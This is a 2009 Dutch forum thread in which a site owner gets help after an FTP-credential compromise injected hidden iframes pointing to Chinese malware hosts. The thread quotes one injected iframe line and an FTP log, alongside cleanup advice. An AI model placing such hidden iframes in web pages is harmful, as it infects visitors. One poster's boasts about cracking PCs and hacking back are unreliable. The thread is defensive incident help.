site gehacked

Status
Niet open voor verdere reacties.

renzolini

Gebruiker
Lid geworden
5 jun 2006
Berichten
257
Mijn site www . infoslovenia.be is sinds gisteren gehacked.

boven iedere pagina staat een witruimte en in de code zie ik op iedere pagina volgende regel:

HTML:
<body ONLOAD="preloadImages();"><iframe src="http://shopmovieproduction.cn:8080/index.php" width=144 height=137 style="visibility: hidden">
</iframe>

Ik heb al contact opgenomen met Flexwebhosting.

Wat kan ik doen opdat ik dat niet meer kan voorhebben? Zijn er nog mensen met hetzelfde probleem of die dat probleem al gehad hebben?



Moderator-[Edit] Link niet-klikbaar gemaakt ivm popups en trojans. Html-tag toegevoegd. [/Edit]
.
 
Laatst bewerkt door een moderator:
Dit is een trojan die op je site is geplaatst. Kijk hier maar.

Het voorkomen is lastig als je niet weet hoe je site geïnfecteerd is geraakt. Het kan via je eigen account zijn gebeurd maar men kan ook gebruik hebben gemaakt van een "lek" bij je hosting provider.

In dat laatste geval kun jij niet veel doen.

Heb je de site zelf gebouwd of is dat uitbesteed?
 
Ik heb al een mailtje teruggekregen van de hostingprovider. Er nog bij zeggen dat ik deze site zelf heb gemaakt en via één pc de bestanden upload.

Dit is hem, vreemde is dat ik op dat tijdstip mijn pc niet eens aanlag.
----------------------------------------------------------------------
--------------------------------------------------------------------------------
Beste Renzo,

Deze code is via uw persoonlijke FTP account aangepast, er is geen sprake van een hack of lek op de server of website.
Dit probleem kunnen wij ook niet voor u oplossen daar de oorzaak zeer waarschijnlijk op uw eigen PC zit of op een andere PC waarmee u toegang heeft tot uw hosting pakket. Een pc is zeer waarschijnlijk besmet met een trojan, virus, keylogger of erger een rootkit.
De laatste is niet te verwijderen en zeer moeilijk op te sporen door virusscanners, een keylogger is ook heel vaak niet te vinden met de standaard programma's, virussen en trojans kunnen vaak wel redelijk goed worden opgespoord en verwijderd.

Ik wil u daarom adviseren om uw pc zeer goed op te schonen, beter is nog te herinstalleren, daarna ALLE logins te resetten als u 100% zeker bent dat uw ook echt schoon is.
Maar nogmaals root kits en keyloggers worden meestal **NIET** gezien door de laatste virusscanner en kunnen meestal ook **NIET** worden verwijderd, enkel een herinstallatie van de gehele pc is dan hier de enige en juiste optie!
Als u de logins vervolgens heeft gereset plaatst u een schone backup terug, hiermee zou u probleem verholpen zijn.

Hier volgt nog een stukje log van uw FTP account, hierop is duidelijk te zien dat er vanaf diverse verschillende IP adressen een FTP verbinding wordt gemaakt met uw gebruikersnaam:

---------------- BEGIN ------------------------

::ffff:98.199.170.51 UNKNOWN slovenia [11/Jun/2009:18:43:59 +0200] "STOR index.php" 226 2992
::ffff:75.71.144.4 UNKNOWN slovenia [11/Jun/2009:18:44:07 +0200] "RETR index.php" 226 3948
::ffff:78.129.32.239 UNKNOWN slovenia [11/Jun/2009:18:44:13 +0200] "RETR index.php" 226 3948
::ffff:190.19.249.48 UNKNOWN slovenia [11/Jun/2009:18:44:25 +0200] "STOR index.php" 226 3947
::ffff:24.77.223.76 UNKNOWN slovenia [11/Jun/2009:18:44:34 +0200] "RETR index.php" 226 4720
::ffff:99.234.222.141 UNKNOWN slovenia [11/Jun/2009:18:44:42 +0200] "STOR index.php" 226 4719
::ffff:24.131.33.99 UNKNOWN slovenia [11/Jun/2009:18:44:50 +0200] "RETR index.php" 226 3604
::ffff:96.14.61.204 UNKNOWN slovenia [11/Jun/2009:18:45:05 +0200] "STOR index.php" 226 3603
::ffff:70.137.30.172 UNKNOWN slovenia [11/Jun/2009:18:45:13 +0200] "RETR index.php" 226 3565
::ffff:83.87.226.63 UNKNOWN slovenia [11/Jun/2009:18:45:21 +0200] "STOR index.php" 226 3564
::ffff:86.2.185.129 UNKNOWN slovenia [11/Jun/2009:18:45:29 +0200] "RETR index.php" 226 6155
::ffff:68.190.19.48 UNKNOWN slovenia [11/Jun/2009:18:45:37 +0200] "STOR index.php" 226 6154
::ffff:66.88.140.244 UNKNOWN slovenia [11/Jun/2009:18:45:50 +0200] "RETR index.php" 226 3478
::ffff:68.84.67.63 UNKNOWN slovenia [11/Jun/2009:18:46:04 +0200] "STOR index.php" 226 3477
::ffff:68.4.208.105 UNKNOWN slovenia [11/Jun/2009:18:46:13 +0200] "RETR index.php" 226 3707
::ffff:141.225.56.76 UNKNOWN slovenia [11/Jun/2009:18:46:25 +0200] "STOR index.php" 226 3706
::ffff:68.205.63.164 UNKNOWN slovenia [11/Jun/2009:18:46:32 +0200] "RETR index.html" 226 10170
::ffff:173.88.23.100 UNKNOWN slovenia [11/Jun/2009:18:46:41 +0200] "STOR index.html" 226 10285


Thu Jun 11 18:45:29 2009 3 ::ffff:86.2.185.129 6155 /home/slovenia/domains/infoslovenia.be/public_html/woordenboek/culinair/index.php a _ o r slovenia ftp 0 * c
Thu Jun 11 18:45:37 2009 0 ::ffff:68.190.19.48 6154 /home/slovenia/domains/infoslovenia.be/public_html/woordenboek/culinair/index.php a _ i r slovenia ftp 0 * c
Thu Jun 11 18:45:50 2009 0 ::ffff:66.88.140.244 3478 /home/slovenia/domains/infoslovenia.be/public_html/woordenboek/zinnen/index.php a _ o r slovenia ftp 0 * c
Thu Jun 11 18:46:04 2009 0 ::ffff:68.84.67.63 3477 /home/slovenia/domains/infoslovenia.be/public_html/woordenboek/zinnen/index.php a _ i r slovenia ftp 0 * c
Thu Jun 11 18:46:13 2009 0 ::ffff:68.4.208.105 3707 /home/slovenia/domains/infoslovenia.be/public_html/zoekmachine/index.php a _ o r slovenia ftp 0 * c
Thu Jun 11 18:46:25 2009 0 ::ffff:141.225.56.76 3706 /home/slovenia/domains/infoslovenia.be/public_html/zoekmachine/index.php a _ i r slovenia ftp 0 * c
Thu Jun 11 18:46:32 2009 0 ::ffff:68.205.63.164 10170 /home/slovenia/domains/infoslovenia.be/stats/index.html a _ o r slovenia ftp 0 * c
Thu Jun 11 18:46:41 2009 0 ::ffff:173.88.23.100 10285 /home/slovenia/domains/infoslovenia.be/stats/index.html a _ i r slovenia ftp 0 * c

------------------ END --------------------------
De FTP log file is aanzienlijk groter met veel meer vermeldingen van uw login, dit is dus maar een kleine selectie van de laatste login pogingen.





Ik heb een htaccess bestand gemaakt en daarin het ipadres geblokkeerd.

Verhelp ik hiermee het probleem?



Mod-[Edit] 2 posts samengevoegd. Onnodige quote verwijderd. Klik “Reageer op vraag” ipv “Quote”. [/edit]
.
 
Laatst bewerkt door een moderator:
Hmm..., heb een aantal van die IP adressen opgezocht en ze zitten o.a. verspreid over de US, Canada, Argentinië en België. Die Belgische zou je zelf kunnen zijn gok ik als je tenminste in Marchienne-au-pont woont.

Allereerst raad ik je inderdaad aan te scannen met Antimalwarebytes en een goede virusscanner. Ook een online scanner nadat je een eigen virusscanner hebt gedraaid kan goed zijn. Infecties verwijderen als je die tegenkomt. PC opschonen met CCleaner. Hierna (als er tenminste infecties zijn verwijderd) je wachtwoord van je FTP site wijzigen en dan er goed op letten of het terug komt. Hopelijk ben je er daarna van af. Als dat niet zo is of er zijn geen infecties gevonden heb je een wellicht vervelender probleem te pakken.

De provider heeft gelijk dat als er een rootkit gebruikt is dat dit bijna niet te detecteren valt met een anti malware of virus scanner. Daarbij helpt alleen het offline koppelen van de harde schijf aan een "forensische" schrijf beveiligde PC en dan daar te scannen. Er zijn wel forensische live CD's te vinden op het net maar dan moet je echt weten waar je mee bezig bent. Simpeler is het om in dat geval een backup te maken van je bestanden (alleen je werkbestanden dus niet programmatuur etc.) De schijven en partities opnieuw in te stellen met FDISK of Partition Magic o.i.d. en te formateren. Daarnaast ook even met FDISK het Master Boor record opnieuw opbouwen. Begin echter eerst maar eens met de eerste stappen.

Ik heb een htaccess bestand gemaakt en daarin het ipadres geblokkeerd.

Verhelp ik hiermee het probleem?

Van Htaccess heb ik geen verstand. Wellicht dat iemand anders je daarmee kan helpen. Sorry :(

Je hebt wel een probleem dat het met je eigen account zou zijn gedaan. Dat betekend dat je inlog gegevens onderschept zijn.



Moderator-[Edit] 2 posts samengevoegd. [/Edit]
.
 
Laatst bewerkt door een moderator:
Ik vraag me af: die servertijden, kan dat ook een buitenlandse tijd zijn ?
Dan is er tijdsverschil.
 
Als ervaren Hacker kom ik vaak binnen door eerst jou Persoonlijke Computer te kraken...

Met wachtwoorden zoeken en doorsturen kan ik als jij offline bent, je kunt dat zien alles aanpassen en zo dit soort grappen uit halen.

Als je alles op computer hebt staan alles herplaatsen is meestal voldoende en controleer je computer op lekken of dubieuze programma's, vooral die je laatste maanden geïnstalleerde, want soms zit daar iets extra bij.

Zelf doe ik dit soort onzin nooit maar als werk zoek ik naar fraudeurs die we dan kunnen oppakken.
Dus er bestaan ook nette Hackers die info zoeken van criminelen in ruimste zin van het woord.

Wachtwoord aanpassen, en ook de Wifi verbinding want daar zitten vaak zwakke schakels.

Als vrienden jou internet gebruiken is dit ook een risico dus als ik op visite kom, gewoon voorzichtig zijn en gelijk na afloop de Wifi beveiliging aanpassen en zorg er voor dat jou PC als ik bezig ben uit staat....
 
als jij offline bent
Knap dat je dan van zijn ipadres af kunt inloggen met ftp :p

Trouwens, hoe lang denk jij dan nog mijn vriend te zijn als jij zulke geintjes op mijn pc zou uithalen ?
 
Laatst bewerkt:
Advies van Digger en je provider opvolgen. En vooral daarna, als alles schoon is: ál je wachtwoorden en dergelijke aanpassen. En 'n minder voor de hand liggende username gebruiken onder het motto: alle beetjes helpen.
ip-adres blokkeren heeft weinig zin, want ze gebruiken meerdere adressen. Mogelijk doen ze dat zelfs via andere gehackte computers.
En je moet natuurlijk die code van al je pagina's verwijderen.
Wat betreft de tijd: dat is gewoon de internettijd, met een correctie voor de tijdzone. Die correctie is op de server van de hoster ingesteld. Maar die tijd is dus voor de hele wereld hetzelfde.

Edit: ik zie trouwens dat je site nog steeds gehackt is. Ik zou er echt heel snel wat aan doen, of 'm desnoods even offline halen, anders kom je op allerlei blacklists en zo terecht en heb je 'n groter probleem. Daar kom je wel weer af, maar dat kost tijd en zo.
__________________

Goeroeboeroe is nu online
RapporteerMeld misbruik in dit bericht.182 aanpassen
 
Laatst bewerkt:
Ik bedoelde alleen maar dat het op deze manier kan.

Ik ga nu niet uitleggen hoe je dat FTP kan doen....
Eerst dus gegevens en IP nummer en zo zoeken en als de eigenaar off line is pas toeslaan.

Ik zoek zo dubieuze oplichters en fraudeurs die we zo proberen uit te schakelen of leeg te plukken via pluk ze wet.

Dus ik zal bij U nooit komen tenzij.....
Alleen onderzoek en pas indien het noodzakelijk is pas iets aanpassen.

Alleen zou ik onzichtbare dingen plaatsen om te kijken wie zijn site bezocht om eventueel netwerk te vinden.
Dus er zijn naast criminele ook nette Hackers die nuttig werk verrichten.

Dus niet denken dat elke Hacker fout is.
 
Laatst bewerkt:
Daarom noemen ze dat ook ethical hacking. Dan is het onderscheid gelijk duidelijk... ;):thumb:
 
Ik stel voor dat we 't 'n beetje on topic houden en niet met allerlei flauwekul aankomen. Speciale software installeren om te kijken wie je site heeft bezocht? Dat staat gewoon open en bloot in de logs. Speciale opdrachten om te kijken wie zo'n simpele site heeft gehackt? Man, hou toch op. Dat gebeurt honderden keren per dag en is alleen bij banken en zo interessant genoeg voor 'n onderzoek. Voor zo'n 'onderzoek' is geen aanklacht nodig. En de politie gaat echt geen onderzoek instellen of opdracht daarvoor geven voor zo'n simpele hack.
 
Voor een simpele doen ze inderdaad niets maar ik weet hoeveel er komen en door de dader terug te hacken is er soms een oplossing van honderden iets minder deskundige gebruikers.

Deze illegale webshop reclame staat bij mijn collega in PC, dus hij is al bezig.
Dus omdat ze misbruik maken van andere en ruimte stelen word er dus al iets gedaan aan zijn inbraak.

We proberen zowel de winkel als de persoon die dit uitvoerde te vinden, maar juist die laatste gebruikte vermoedelijk open Wifi verbindingen gezien de IP nummers.

De Hack is uitgevoerd op zelfde notebook en via 28 Wifi verbindingen dus we weten zijn woonplaats.
Dus aangifte is in dit geval overbodig want er zijn erg veel eenvoudige gebruikers met zelfde probleem gemeld.
Verder mag ik geen info geven.
 
Toch knap dat je aan het ipadres kunt zien dat het wifi is. :rolleyes:

Enneh, reclame die krijg je gewoon via je browser hoor, daar hoeft niemand je pc voor te hacken.

En die winkel vinden ? lijkt me toch stug dat een winkel geen adresgegevens heeft. Wil die winkel niks verkopen of zo ?
 
Laatst bewerkt:
Ga toch niet meer serieus in op die onzin. 't Adres van die 'winkel' stond al min of meer in Diggers eerste post hier. En 't is in drie seconden te vinden: 'n in China gevestigd iets.

Tot we weer iets horen van de TS geloof ik 't wel. En nog even aan renzolini: je site is nog steeds online inclusief malware. 't Maakt mij verder niets uit, maar 't is 'n kwestie van (heel weinig) tijd voordat je in Google en dergelijke met 'n hele grote knalrode waarschuwing komt te staan. Het is echt beter om dat te voorkomen. Dus ik zou je site echt zo snel mogelijk opschonen of, als dat niet kan, tijdelijk even vervangen door 'n melding dat er problemen zijn of zo.
 
kben terug van weekend, nu cccleaner aan het scannen daarna nog enkele andere programma's.

Voor de hand liggende passwoorden gebruik ik allesinds niet.

Enfin je ik vind het *****, zeker omdat het gaat om een informatieve site die niet commercieel gericht is:confused:.

Ik vind het ook vreemd dat het enkel maar bij www.infoslovenia.be gebeurd en niet bij mijn andere sites op mijn pc?

Is er daar een verklaring voor
 
Waarom heb je 3 tellers op je website ?

Ook in zo'n stuk javascript kan een exploit zitten.
Hoe meer van zulke code, hoe groter de kans op rotzooi.
 
Ik moet je helaas 'n droeve mededeling doen: ook op renzolini staat 'n verborgen iframe naar 'n site in China, op diverse pagina's. Naar bigcreativetop.cn. Ik neem aan dat dat niet van jou afkomstig is.
't Lijkt er dus op dat je hoster gelijk heeft en dat de besmetting via jouw computer heeft plaatsgevonden. Of dat iemand op een of andere manier gebruikersnaam en toegangscodes heeft gekregen
Je provider en digger hebben je 'n aantal tips gegeven. Ik zou die echt állemaal afwerken, en persoonlijk zou ik m'n harddisk formatteren en Windows opnieuw installeren, om de redenen die je hoster opgeeft. Als je daar zelf de kennis niet voor hebt, vraag dan iemand anders of laat het in 'n betrouwbare winkel doen.
Als je dan zeker weet dat je computer schoon is, moet je ál je html nakijken en alles opnieuw uploaden. . En vooral ook: ál je gebruikersnamen en wachtwoorden wijzigen. Ook die niet voor je site zijn, maar voor bijvoorbeeld dit forum. Als iemand in je computer heeft kunnen rondkijken, is in principe niets meer betrouwbaar.
En nogmaals: ik zou m'n sites offline halen tot dit is gebeurd. Je hebt echt stinkende mazzel dat je nog niet op de zwarte lijst van Google (en anderen) staat, maar dat gaat gegarandeerd gebeuren. Daar heb je echt meer ellende van dan 'n tijdelijke mededeling dat er problemen zijn. Maar goed, dat moet je verder zelf weten.
 
Laatst bewerkt:
Ik moet je helaas 'n droeve mededeling doen: ook op renzolini staat 'n verborgen iframe naar 'n site in China, op diverse pagina's. Naar bigcreativetop.cn. Ik neem aan dat dat niet van jou afkomstig is.
't Lijkt er dus op dat je hoster gelijk heeft en dat de besmetting via jouw computer heeft plaatsgevonden. Of dat iemand op een of andere manier gebruikersnaam en toegangscodes heeft gekregen
Je provider en digger hebben je 'n aantal tips gegeven. Ik zou die echt állemaal afwerken, en persoonlijk zou ik m'n harddisk formatteren en Windows opnieuw installeren, om de redenen die je hoster opgeeft. Als je daar zelf de kennis niet voor hebt, vraag dan iemand anders of laat het in 'n betrouwbare winkel doen.
Als je dan zeker weet dat je computer schoon is, moet je ál je html nakijken en alles opnieuw uploaden. . En vooral ook: ál je gebruikersnamen en wachtwoorden wijzigen. Ook die niet voor je site zijn, maar voor bijvoorbeeld dit forum. Als iemand in je computer heeft kunnen rondkijken, is in principe niets meer betrouwbaar.
En nogmaals: ik zou m'n sites offline halen tot dit is gebeurd. Je hebt echt stinkende mazzel dat je nog niet op de zwarte lijst van Google (en anderen) staat, maar dat gaat gegarandeerd gebeuren. Daar heb je echt meer ellende van dan 'n tijdelijke mededeling dat er problemen zijn. Maar goed, dat moet je verder zelf weten.

En wat dan stel dat ik mijn pc héél formatteer, hoelang zal het dan duren vooraleer ik weer zelfde tegenkom?

Tegen dat iemand me in het hoofd haal om mijn site aan te vallen?

Enfin ja, mijn renzolini site mag dan wel ook aangetast zijn, mijn andere site blijkbaar niet of nog nie? wie zal het zeggen.

Kben héél het ontgoocheld, om de 6 maanden mag ik mijn pc binnen doen:(
 
Heb je eigenlijk wel een virusscanner draaien ?

Als een programma besmet is, bv je ftp-programma, dan kun je formatteren wat je wilt, maar zul je het probleem altijd houden.

Beter is om zoveel mogelijk programma's opnieuw te downloaden.
 
Ja, dat je ontgoocheld bent kan ik me heel goed voorstellen. Ik heb jarenlang troep verwijderd uit computers en zo'n beetje iedereen had die reactie.
Je moet 't niet zien als 'n soort persoonlijke aanval op jou of op je site. Dat soort ongelooflijke rotzakken scannen gewoon automatisch computers/internet af, en toevallig ben jij de pineut.
't Is nu even heel vervelend, maar je kunt er wel degelijk heel veel aan doen in de toekomst. (Voor mij waren dit soort dingen trouwens één van de redenen om over te stappen naar Linux, maar dat moet je maar net willen.)
Dat opschonen van je computer, daar ontkom je niet aan. Je kunt kiezen voor alleen controle op virussen en zo, maar tegenwoordig zou ik zelf kiezen voor formatteren en opnieuw installeren vanaf 'n originele cd/dvd. Eén van de redenen dat ik geen computers meer 'schoonmaak' is dat je eigenlijk niet kunt garanderen dat dat nog werkt, of je moet inderdaad met allerlei super speciale apparatuur gaan werken. En dat kan eigenlijk alleen maar in 'n werkplaats, niet thuis.
Ook al je programma's opnieuw installeren vanaf 'n originele cd/dvd of opnieuw downloaden, want ook die kunnen besmet zijn.
Daarna: zorg voor 'n back-up van je sites. Die moet je BUITEN je computer bewaren, dan weet je redelijk zeker dat die niet besmet is. Vertrouw niet op je hoster, ook bij zijn back-ups kan iets misgaan.
Als je dan vervolgens 'sterke' wachtwoorden en zo kiest (via Google vind je tig sites e.d. die je daarmee kunnen helpen), dan helpt dat ook. En die niet laten slingeren. Draadloze verbindingen goed versleutelen (zelf wil ik helemaal geen draadloos, te 'lek').
Goeie virusscanner en firewall. Als je al dat soort dingen goed, is de kans niet zo groot dat 't nog 'ns gebeurt. Of áls 't nog 'ns gebeurt, dan heb je in ieder geval 'n schone back-up die je kunt gebruiken. Dan ben je hoogtens 'n paar dagen werk of zo kwijt, als je die regelmatig maakt.l

hèhè, Jedi kruiste me, voor 'n deel herhaal ik hem...
 
Laatst bewerkt:
Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan